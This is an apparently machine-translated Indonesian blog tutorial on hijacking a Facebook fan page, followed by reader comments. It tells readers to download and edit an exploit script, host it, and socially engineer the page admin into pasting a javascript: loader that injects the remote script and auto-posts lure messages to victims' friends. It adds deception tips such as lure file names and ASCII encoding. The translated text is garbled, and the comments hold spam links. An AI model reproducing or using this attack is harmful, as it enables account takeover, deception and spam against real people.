Cara Hack Facebook menggunakan FanPage terbaru saat ini Download Software

Cara Hack Facebook menggunakan FanPage terbaru saat ini Download Software




Kemarin lalu saya akan menunjukkan cara untuk hack Facebook fan page. Ini adalah posting pertama saya di Kebenaran Hacking dan saya sangat gembira dengan hal itu. Saya harap Anda menyukai tutorial ini dan memberikan umpan Anda kembali di komentar.Sekarang mari kita memulai tutorial. Pertama-tama kita perlu untuk setup sebuah mengeksploitasi dan sebuah website untuk host mengeksploitasi. Jika Anda sudah memiliki hosting maka yang besar jika tidak ada beberapa situs hosting gratis yang dapat digunakan untuk tujuan tersebut. Saya akan memberitahu Anda tentang hal itu bersama dengan tutorial.Disclaimer: Coder dan situs terkait tidak bertanggung jawab atas penyalahgunaan dilakukan dengan menggunakan trik ini.

1. Download dari link ini mengeksploitasi.Link.


2. Setelah men-download, Anda perlu mengedit itu. Dapatkan notepad + +, salah satu editor panas favorit saya. Anda dapat men-download dari sini.here.

 
3. Buka file tersebut dengan notepad bernama pagehack.js + +. Sekarang menemukan teks [email protected] dengan menekan CTRL+F dan menggantinya dengan id email anda sendiri yang telah digunakan saat mendaftar untuk facebook.


4. Sekarang Anda harus mengubah teks virus yang akan dikirim ke teman-teman korban. Untuk melakukan ini, menemukan teks Hei Lihat apa yang saya punya!dan menggantinya dengan teks Anda sendiri.

 Teks ini akan dikirim ke facebook dinding dari 15 teman-teman korban. Sejak itu adalah bot autoposting, untuk mencegah facebook dari menghalangi itu, saya mengurangi kapasitasnya untuk 15. Sekarang hanya simpan sebagai anything.js 
(Tip: Jadilah insinyur sosial dan rename menjadi sesuatu yang lebih menarik seperti getprizes.js atau booster.js)

5. Sekarang Anda harus meng-upload script ini ke server Anda. Untuk ini membuat account di 0fess.net atau 000webhost.com (t35 atau 110MB tidak akan membantu kali ini) dan menggunakan filezilla dan upload ini ke root anda. Jadi alamat mana script Anda upload akan sebagai berikut:www.yoursite.0fess.net/booster.js


6. Sekarang sampai pada bagian terpenting dari Hack ini. Anda perlu meyakinkan admin bahwa halaman Fan untuk menempatkan kode berikut 

(Catatan: Jangan lupa untuk mengganti teks dalam huruf tebal dengan alamat naskah Anda) di address bar browser-nya dan tekan enter sementara ia ada di Facebook. 

javascript:. (. a = (b = dokumen) createElement ("script")) src = "/ / www.yoursite.0fess.net/booster.js", b.body.appendChild (a); void (0) 

Tip: Anda dapat menipu dirinya dengan membuatnya serakah untuk meraih sesuatu. Anda juga dapat mengkodekan ini dalam format ASCII untuk hasil yang lebih baik lagi.


bagi yang mengkopy artikel ini
Sertakan alamat ini ; http://rafi-orilya.blogspot.com/

Terima Kasih
by Rafi Aldiansyah Asikin

27 komentar

  1. Waktu aku buka pagehack.js di file, jadinya malah error :( Padahal aku udh download Notepad 5.9.3
    Tolong solusinya yah gan ^^

    BalasHapus
  2. Gini, gan..
    Pertama download dulu Notepad++
    trus, klik open nah.. buka file "pagehack.js"
    gitu, gan..
    Lebih mendukung pake OS XP

    BalasHapus
  3. Untuk newbie ky ane lumayan puyeng jg yh . .
    Hehe
    pdhl pngn bAntU fp temen yg di hack . .
    Bisa bAnTu gk gan ?

    BalasHapus
  4. Praktek lapangan langsung aja gan..
    Ini tuh sejenis, Phising...
    Tutor.a pahami lagi,

    BalasHapus
  5. bang, gimana. aku belum paham nih -_-

    BalasHapus
  6. Gini. nih... pada tahap 1 : download dulu code scriptnya
    tahap 2 : download program untuk buka script itu
    tahap 3 dan 4: silahkan edit sesuai tutor diatas
    tahap 5 : Upload pada hosting yg biasa digunakan agan
    tahap 6 : melakukan proses phising, dengan membuat target mengcopy paste code diatas dan menekan enter.. sukses..

    BalasHapus
  7. Link downloadnya tidak berfungsi? apa ada link alternatif utk mendownload nya?

    BalasHapus
  8. Masih, om...
    Silakan klik Link download => Reguler Download => masukin Code => Klik Download.

    BalasHapus
  9. bingung ... :o

    BalasHapus
  10. mantap gan... thanks info nya

    BalasHapus
  11. Vhy E.L.F : Coba pahami tutor.nya dari awal deh.. Sukses yaah-
    Linuxer Maros : Yohoo, masama gan... :)
    Thank's kunjungannya..

    BalasHapus
  12. Waktu search [email protected] itu tulisannya lgsg gini "Can't find the text: "[email protected] " Trus gmn dong?

    BalasHapus
  13. Coba cari manual....
    Pastikan bukanya pake Notepad++
    Silahkdan download dahulu

    BalasHapus
  14. kagak kebaca tulisannya, kalimat2nya juga gak beraturan, pke bhs indo yang baik dan benar, itu saran n kritik gw, terserah mau diikutin atau gak

    BalasHapus
  15. Saya dapet tutorial itu dari web luar...
    Terus, saya langsung translate-

    BalasHapus
  16. Mas Rafi, sekarang banyak fanpage yg menurut saya sangat tidak sopan dan tidak pantas untuk beredar dengan mudahnya di fb dan dilihat semua pengguna fb trmsk anak2 yg skrg sdh biasa berinteraksi dg fb. Untuk mematikan atau mengambil alih fanpage tsb, apakah ada caranya? Bisa menggunakan cara ini juga? Trmksh.

    BalasHapus
    Balasan
    1. Mungkin sekarang cara diatas sudah tidak bisa.. mas... maaf blum bisa bantu nih..

      Hapus
  17. Hmm.. Tapi kok gak bisa yha :-/

    BalasHapus
  18. Gak work gan, ini kayak fake gitu ??

    BalasHapus
  19. ANDA MAU DAPET PENGHASILAN DENGAN AKUN FACEBOOK MODAL 25 RIBU HASIL bisa nyampe jutaan LEBIH SEBULAN?
    Atau anda mau, AKUN FACEBOOK ANDA MENGALIRKAN JUTAAN RUPIAH SETIAP HARINYA KE REKENING BANK ANDA ??
    Terobosan Paling Mutachir Saat Ini, Anda Dapat Menghasilkan Uang Hanya Dengan Modal Facebook Mau? Info Lengkap http://buzurl.com/aiu76

    BalasHapus
  20. agak ribet sih buat newbie seperti saya. tapi coba dulu saja. terima kasih ya informasinya.
    jangan lupa berkunjung juga ke situs saya gan, www.caraadsense.com

    BalasHapus
    Balasan
    1. Silahkan mas, terima kasih telah berkunjung :)

      Hapus
  21.   Thank you very much for the extensive information and guidance that is all well-planned and well-designed
    فروشگاه اينترنتي
    www.baneh.com
    thanks

    BalasHapus

Komentar anda sangat dibutuhkan bagi kemajuan kami untuk terus berkarya.
Diharapkan :
* Berkomentarlah dengan bahasa yang baik
* Tidak ada unsur SARA, SPAM, PORNO
* Tidak merugikan orang lain
* Menunjukkan identitas yang jelas bukan Anonim

Diperkenankan :
* Komentar promosi link web anda
* Kritik & Saran

[Protected] by DMCA Protection Pro™
EmoticonEmoticon